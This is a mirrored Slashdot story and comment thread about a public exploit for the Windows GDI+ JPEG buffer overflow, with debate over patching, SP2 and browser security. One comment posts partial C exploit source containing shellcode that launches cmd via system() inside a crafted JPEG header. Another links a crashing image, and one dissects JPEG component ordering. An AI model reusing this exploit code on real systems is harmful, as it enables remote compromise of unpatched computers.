Slashdot Mirror
Public Exploit For Windows JPEG Bug
Khoo writes "A sample program hit the Internet on Wednesday, showing by example how malicious coders could compromise Windows computers by using a flaw in the handling of a widespread graphics format by Microsoft's software. Security professionals expect the release of the program to herald a new round of attacks by viruses and Trojan horses incorporating the code to circumvent security on Windows computers that have not been updated. The flaw, in the way Microsoft's software processes JPEG graphics, could allow a program to take control of a victim's computer when the user opens a JPEG file." We mentioned this earlier.
I knew there was something wrong with Goatse when I saw it!
Now, to convince my company's managers to switch their userbase to Firefox, I just need it to support Sso (Single sign-on), please, tell us it's coming otherwise we'll keep using this tyrabrowsaurus...
Trolling using another account since 2005.
The patch for this one is already out. Furthermore, SP2 systems do not have this vulnerability unless Office is installed. SP2 by default has auto-updates enabled. And for Office to be exploited in a SP2 system, the user has to open the file manually.
Code is always buggy. Even Firefox had a JPEG vulnerability of its own. This is dumb ownership, if this bug becomes prevalent.
A NYC lawyer blogs. http://www.chuangblog.com/
What about the vuln. in the PNG libs? Any exploit in the wild?
cpghost at Cordula's Web.
The biggest problem here is when spammers use this in there opt out link. This would probably be much more effective than the scrollbar hack they are using now. It just has to render the damn page, and wham you're infected.
...because I have not seen this mentioned at all.
Is the JPEG rendering in Firefox running on Windows independent of any underlying MS library and is therefore not affected?
On November 5 1999 we had the "Burn all GIFs" day because of patent issues. Shall we announce a "Burn all JPEGs" day because of Microsoft security issues now and switch all to PNG?
Damn. Now in addition to worring about going blind I also have to worry about catching something.
What's all this stuff in the related links?
. Bug whitepapers
. Best deals: Bug
. More Bug stories
. Security whitepapers
. Best deals: Security
. More Security stories
. Windows whitepapers
. Best deals: Windows
. More Windows stories
. Microsoft whitepapers
. Best deals: Microsoft
When did that start happening?
Get your own free personal location tracker
These early POC exploits are covered in todays
:-/
ISC Diary. Note that now there is a script to generate images to add an Admin level user (username "X").
Not too long until we see a remote shell.
Some people are tlaking about seeing it used in an MSN Messenger worm.
The hard part about patching this one is that a lot of third party software may overwrite the Windows JPEG GDI library with its own older version
---- join dshield.org Distributed Intrusion Detec
So much noise about an ordinary Windows insecurity...
.NET core is the last Microsoft's chance to correct its public image as the 'most insecure software vendor'.
IMHO, Longhorn with
Another question: when will Longhorn be out before Duke Nukem Forever?
Does that mean when you watch porn on the Web it is not safe sex anymore? Damn it!!!
Pick your OS and download it here
:)
Also, if you have SP2 or uh, don't use MS software, you're fine
I'm a minister!
And it actually works fairly well. It scans for any program that reads these files and makes sure they don't have the bug in them. If it can't patch them, it bugs you about it so you can find a fix for the app. Only Microsoft apps of course, I don't think Adobe wants Microsoft pushing out software updates for them.
Most of the users I have to support aren't savvy enough to add a printer (omg, with active directory it's like 3 mouse clicks) or install software or apply updates (we use some banking software and it notifies you with a text box to click "OK" and then "File, Update" but I still get called on it every time). That's why at our offices we use Microsoft System Update Server (SUS). It lets us approve patches and then roll them out to all the clients in the domain automagically.
I shudder to think what would happen if I tried to roll out firefox or mozilla to everyone. I'd probably get calls that their "e" was missing and they couldn't connect to the internet. I swear, some people just shouldn't be on computers.
This article has recently been linked from Slashdot. Please keep an eye on the page history for errors or vandalism.
but I have a strong suspicion
... well something you just don't know. Good luck for being objective.
Everyone is entitled to its own suspicion.
The level of polish and craftsmanship of open source software
As opposed to the level of polish and craftmanship of Microsoft's products, of which you know nothing. So you are comparing apples to
Write boring code, not shiny code!
Pick your OS and download it here!
Of course here, is this place --> here
I knew that preview button was good for something
I'm a minister!
You can do something with Active Directory to enable single sign on so that your browser can use your Windows credentials to figure out who you are.
An example being that I log into my laptop on the corporate network in the morning, but then never need to log into our Intranet. It uses my Active Directory credentials to figure out who I am, so displays my own customised and personalised Intranet settings.
I'm not too sure how it works but it's very handy!
--- Band: Joey Ultra
about a year or so back there was a slashdot story about i think macafee researchers talking about viruses being transmitted over images. Everyone called it stupid market speak from a firm trying to sell more AV products by scaring people with somthing that is not possible. I think we all need to offer them an apology. I think this is a bizzare parallel to when people used to joke about email viruses way back in the min 90s. Kind of sad that it is real now. It will be even more so when images are used for exploits too. Though, i suspect those at most risk are those that go to websites looking for lots of images...
The war with islam is a war on the beast
The war on terror is a war for peace
This bug exists in most Microsoft Software. So for someone to patch they can't simply connect to Windows Update and consider themselves safe, they also have to patch Office, Visual Studio, some Microsoft Games, Server Software (misc, not covered by Update) and more.
So don't sit there on an SP2 system and consider yourself safe. There is more than likely a whole host of ActiveX controls just waiting to be called and exploited by this bug.
Also note that some applications written in Visual Basic can also be exploited.
Is there a tool to proccess jpg files searching for malicious content?
You can make a big fucking quilt with all those patches they keep giving out!
Really? It loads pages faster for me. Sure, the initial start up time is worse, but...
:P
Just because you took his comment out of context doesn't mean he's a troll.
well... "know nothing" is not really true counting the numerous holes, fixed holes and whatnot, and also the rather long response times for some of them...
yes i know open source software also has numerous bugs, but as its "open" source the flaws are usually much faster found and fixed within hours (if possible)
-- Karma: beyond good and evil - mostly affected by posting political
It is called NTML authentication.
-jsl
Dyslectics of the world, untie!
M$ Release Sp2 for XP. People resist installing cause they hear it can screw things up etc so they delay installing. M$ announce a new flaw with sample code in the wild, show how every O/S they have (practically) is suseptable EXCEPT XpSp2. ...? Funny order of events no?
Visit London Scalextric Club
Everyone knew it was a backdoor.
Sincerely,
Pan Tarhei Hosé, PhD.
"Homo sum et cogito ergo odi profanum vulgus et libido."
Comment removed based on user account deletion
of which you know nothing
As a user of Microsoft products, I witness their lack of stability, their tendency to crash or exhibit bugs, and their uncanny ability of corrupting user data, and so forth. After putting up with them for so long, I know quite a bit about them.
Moreover, I used to be an employee. I worked at the Redmond campus. I know both the quality exhibited on the outside, and the quality that goes into the products on the inside.
I do indeed know something.
http://sylvana.net/test/AP4.jpg
will crash IE on an updated xp sp2 system.
Open source software has plenty of bugs, duh.
In fact, there are similar problems with parsing image files on Linux as well. Except that Windows is actually more secure, because it has auto-updates turned on by default from XP2 onwards, and stack protection type patches built in by default. On Fedora you have execshield, but that hasn't been fully upstreamed yet so only a small subset of Linux users are protected. I don't know of any distros that download and apply security patches with no user intervention out of the box.
(recall OS X's open source roots)
Even if open source software was perfect (which it isn't) large parts of MacOS X are not open source. Most of the important bits aren't, in fact. Surprise surprise, the Mac has had serious URL handler exploits which are like this JPEG problem: arbitrary code execution via a web browser. Except in the case of the Mac URL handler problems it was a design problem not just an unchecked buffer, to do with insecure-by-design features. D'oh. ActiveX all over again.
So, no, I don't trust Apple any more than Microsoft when it comes to security. How can you? They are both proprietary OS companies, with all the issues that implies.
can never be duplicated by Microsoft's paranoid and closed-doors efforts
These days Microsoft have dedicated programs scanning their code looking for suspicious patterns, security testing teams, and give their developers extensive training in how to write secure code. These are advantages not available to open source coders. If anything I'd say they're close to taking the lead in absolute terms for security (by which I mean, assume equal market share for Windows, Linux, Macintosh - which is more secure).
You know, it might be worthwhile to write things like libjpeg in safe languages.
Ocaml is pretty fast, but I realize that not everyone wants the runtime. How about cyclone? It's an extended version of C that's backwards compatible with C, but can pick up unsafe errors at compile time -- sounds pretty much like what folks might want.
May we never see th
It is already built in. Only hast to be activated per Server.
- about:config
- filter for ntlm
- enter comma separated list for network.automatic-ntlm-auth.trusted-uris
Voila!
-jsl
Dyslectics of the world, untie!
Comment removed based on user account deletion
I don't see a link to the sample exploit in the article...
well, here is one link.
.sig: No such file or directory
Still this may also be very good grounds for a class action against MS, as they are not honouring a users request NOT to use IE.
That anti-trust case will be raised by 2006 and resolved by 2014, by which time the successor to the successor to the successor of Longhorn will be released, with a few more dozen anti-trust issues and another slap on the wrist from the DoJ.
Kjella
Live today, because you never know what tomorrow brings
WindowsUpdate does install a "GDI+ Detection Tool", but I have run this tool on systems with unpatched Visual Studio, Outlook, and Office and it does not detect that the patches are missing. I looked at the strings in this tool, and it basically looks like it checks for MS Photo software.
Manually visiting "officeupdate.microsoft.com" and running those updates will probably cover the most common attack vectors (Outlook, Word), but how many people do this on a regular basis? My users are not admin-level (yet) so they can't use this update site.
Incidentally, every default configuration of IE/Word I have seen allows DOC files with jpegs to be opened in the browser window with no prompting. It will not be hard to get people to run the exploits, and there's plenty of ways for worms to automate themselves without users opening things.
I'm working on a script to detect and run the patches (there's about 17 of them for this bug) but it's going to be a while because of the pre-reqs for many of the patches, and the very specific revisions that must match the patch. "If Visio 2002 is installed, detect which Visio SP level is running. If it's SP0 or SP1, run Visio SP2, then reboot, and run GDI patch"...
Sorry if I'm spreading panic, but this bug sucks.
You remember when she told you that looking at `those' pictures was bad...
_O_
.|< The named which can be named is not the true named
but it was too late, she'd already been wormed.
_O_
.|< The named which can be named is not the true named
Writting a proxy server that validates or blocks all JPG images going through it, is probably possible. Such a proxy can also process PNG, BMP and other vulnerable formats.This proxy could be run either at
the user level (personal protection) or at the ISP level.
Time to start a new open source project !
Everyone seems to be expected infected pr0n or e-mail... it's so much simpler than that it's been scring me since this exploit was announced. I'd say about 2/3rds of the corporate computers in this country are still vulnerable, and enough of them visit MSN or CNN.com on a regular basis for a simple banner ad to give someone a REALLY nice assortment of zombie PCs.
Pavlov's Dog ate the bell, and now he's barking at Schroedinger's cat all the time... -Me
I better make sure to convert all of my porn to
... are the books by Microsoft Press.
Check out the setting "network.automatic-ntlm-auth.trusted-uris". It will automatically send your Windows credentials to any URL listed in the comma-separated list.
æeee!
They're written in the notorious "buffer overflow" languages, so most people will have these problems for the near future.
Meanwhile what you can do is to run each program as a different more restricted user.
On windows XP, run IE with using a shortcut with a runas with savecred (you should modify those in the start menu and quick launch too), and set it so it runs using a very restricted account. The restricted account should either have access to your bookmarks, history and temporary files, or you should run it so it changes to the restricted user's home directory and you allow your main account access to the restricted user's home directory.
Look up the runas command for the options. It'll be more convenient on WinXP since there's the savecred feature.
On UNIX, I think you can use sudo or something similar. Sudo to a restricted account and then run the browser.
This way, if your program gets exploited it can only ruin what the restricted user has access to, it can't easily touch the rest of the system.
Exploits can still theoretically touch the rest of the system since there's stuff like shatter attacks (for windows, not sure about KDE/GNOME), and I'm sure display drivers have bugs of their own and they run in ring 0 (on windows).
But if you do this it raises the bar significantly.
There are other options if you're really paranoid and don't mind the extra effort.
For info on exploits badcoded Note: This is not a 0day site, it is real info for exploit writing.
When we were leaving his room he gave us this advice: "Beware the JPEG virus". It was 9 years ago and he was quite old and sometimes he acted/talked nonsense so we made fun of his advice (we thought: since it was not an executable file, how could it bring a virus): but he was right and we were wrong..
This message doesn't need a sig
I've come up with the ultimate computer exploit, ever. You make a jpg of goatse, with this exploited code in it. The exploit code runs an application which activates any webcams, if present, and starts taking pictures, which it then sends back to the 31337 h4x0r.
Think of it, an entire gallery of horrified faces, kinda like in The Ring when people's faces went all nasty after watching the video.
Here's the copy I tested with (compiles with just about any C compiler, I used MS Visual C++ with the command line "cl /MD exploit.c"). I've disassembled the shell code to be sure it does what's claimed, and it seems legit to me.
.JPG file,
// push // mov eax,esp // push eax // mov eax,77c28044h (address of system() on WinXP SP1) // call eax
// Lameness filter doesn't like C code....
//aksdnckdnaslcjknasdcjknasdlcnjklasdncj klasdnckldnscjkldnaslcjkansdjklcnasljkcnaalksdjncl ajksdnclka
//asdjkcnhladksjcnklasdjcnklasdjnclajk sdncklasndlckjansdcjknalsdkclaksdjcnlajkdnclaknldj klaegfjkaehg
//12345kjbfjwerv7890werw14hbfwjfbkjk 2jksnksbhcjksbckjhbkdbakjbdkcjbskcjabkyuajwjbhawhj fgasdiouchacbk
//aduicyga897schjawegiuci7akcajhwb vekjhcaw78cyakdjachbdjkka7w6ieucbdihcbajksdhbciauy cguaddbiua76teui
//jkasdbcdbhsajkbhsdcabsdjkcbkad kcabscadcbasbdcabddsbcasdcbascdbcasbdcadcbdasbcasb cjhabscadjkasdbckj
//ZZZZZZZZZZZZZZZZZZZZZZZZZZZZ ZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZ
//ZZZZ ZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZ ZZZZZZZZZZZZZZZZ
//ZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZ ZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZ
//jkasdb cdbhsajkbhsdcabsdjkcbkadkcabscadcbasbdcabddsbcasdc bascdbcasbdcadcbdasbcasbcjhabscadjkasdbckj
// GDI+ buffer overrun exploit by FoToZ
// NB: the headers here are only sample headers taken from a
// with the FF FE 00 01 inserted in header1.
// Sample shellcode is provided
// You can put approx. 2500 bytes of shellcode...who needs that much anyway
// Tested on an unpatched WinXP SP1
#include <direct.h>
#include <stdio.h>
char shellcode[]=
"\x68"
"cmd "
"\x8B\xC4"
"\x50"
"\xB8\x44\x80\xC2\x77"
"\xFF\xD0"
;
char header1[]=
"\xFF\xD8\xFF\xE0\x00\x10\x4A\x46\x49\ x46\x00\x01\x02\x00\x00\x64"
"\x00\x64\x00\x00\xF F\xEC\x00\x11\x44\x75\x63\x6B\x79\x00\x01\x00"
"\ x04\x00\x00\x00\x0A\x00\x00\xFF\xEE\x00\x0E\x41\x6 4\x6F\x62\x65"
"\x00\x64\xC0\x00\x00\x00\x01\xFF\ xFE\x00\x01\x00\x14\x10\x10\x19"
"\x12\x19\x27\x1 7\x17\x27\x32\xEB\x0F\x26\x32\xDC\xB1\xE7\x70\x26"
"\x2E\x3E\x35\x35\x35\x35\x35\x3E";
char setNOPs1[]=
"\xE8\x00\x00\x00\x00\x5B\x8D\x8B"
" \x00\x05\x00\x00\x83\xC3\x12\xC6\x03\x90\x43\x3B\x D9\x75\xF8";
char setNOPs2[]=
"\x3E\xE8\x00\x00\x00\x00\x5B\x8D\x8B "
"\x2F\x00\x00\x00\x83\xC3\x12\xC6\x03\x90\x43\x 3B\xD9\x75\xF8";
char header2[]=
"\x44"
"\x44\x44\x44\x44\x44\x44\x44\ x44\x44\x44\x44\x44\x01\x15\x19\x19"
"\x20\x1C\x2 0\x26\x18\x18\x26\x36\x26\x20\x26\x36\x44\x36\x2B\ x2B"
"\x36\x44\x44\x44\x42\x35\x42\x44\x44\x44\x4 4\x44\x44\x44\x44\x44"
"\x44\x44\x44\x44\x44\x44\ x44\x44\x44\x44\x44\x44\x44\x44\x44\x44"
"\x44\x4 4\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\xFF\ xC0\x00"
"\x11\x08\x03\x59\x02\x2B\x03\x01\x22\x0 0\x02\x11\x01\x03\x11\x01"
"\xFF\xC4\x00\xA2\x00\ x00\x02\x03\x01\x01\x00\x00\x00\x00\x00\x00"
"\x0 0\x00\x00\x00\x00\x03\x04\x01\x02\x05\x00\x06\x01\ x01\x01\x01"
"\x01\x00\x00\x00\x00\x00\x00\x00\x0 0\x00\x00\x00\x00\x01\x00\x02"
"\x03\x10\x00\x02\ x01\x02\x04\x05\x02\x03\x06\x04\x05\x02\x06\x01"
"\x05\x01\x0
I've *always* scanned ALL files -- because even in the DOS era, you could never rely on the extension and the functionality having anything to do with one another. (Remember XTreeGold for DOS? the *.XTP files are *executables*, called by XTG.EXE as needed.)
:(
Occasionally even then, the front end of a virus was named whatever.com and was itself "clean" (so would be passed by most scanners), but its job was to call the REAL executable, named something like whatever.dat, which contained the virus code (and if you limited your scanner to known-executables, it would be missed). I have personally seen a virus carried in the whatever.dat part of some purported utility.
As to viruses in image files, it has always been theoretically possible to execute code placed in a GIF's comment field, and I vaguely recall there was a similar exploit possible for JPGs. The only reason this GIF exploit was never seen in the wild is because in the olden days, you couldn't count on everyone using the same viewing software; there were dozens of DOS image viewers, no two of which worked alike. NOW, a virus author can pretty much count on the majority of users using such files thru some combination of Windows, IE, and M$Office, so such formerly-obscure tricks become worth the bother. Much more so when M$ kindly offers malware authors a leg up like this.
~REZ~ #43301. Who'd fake being me anyway?
Important part is in bold.
On that site are 3 important images: AlexPaul2, AP3, and AP4. All 3 display correctly in Firefox, IrfanView, and Windows Picture and Fax Viewer. The only problem seems to be with IE.
With IE:
AlexPaul2 - correct
AP3 - hues are wrong, red and blue appear to be switched
AP4 - CRASH
All of these use 3 components in the scan, so there are 6 bytes total for that portion of the SOS block.
AlexPaul2: 0100 0211 0311
AP3: 0100 0311 0211
AP4: 0311 0211 0100
I have tried switching the order of these to each other and the problem absolutely stems from here.
AP4 to AP3: 0100 0311 0211 - there is a red/blue hue difference between most programs and IE.
AP4 to AP2: 0100 0211 0311 - there is no difference between the programs and IE.
AP3 to AP4: 0311 0211 0100 - IE CRASH!
AP3 to AP2: 0100 0211 0311 - there is no difference, but the red/blue hue switch appears in BOTH normal programs and IE. In other words, AP3 appears the same in IE with both settings.
This last result makes me think IE is somehow trying to re-order these in ascending Component ID order, and this causes the errors.
One thing the JFIF document I found doesn't mention is that the order of these components matters. Changing the order always makes the jpeg appear different (sort of like a newspaper comic with the inks misaligned) in non-IE programs. If anyone knows more about this, please respond.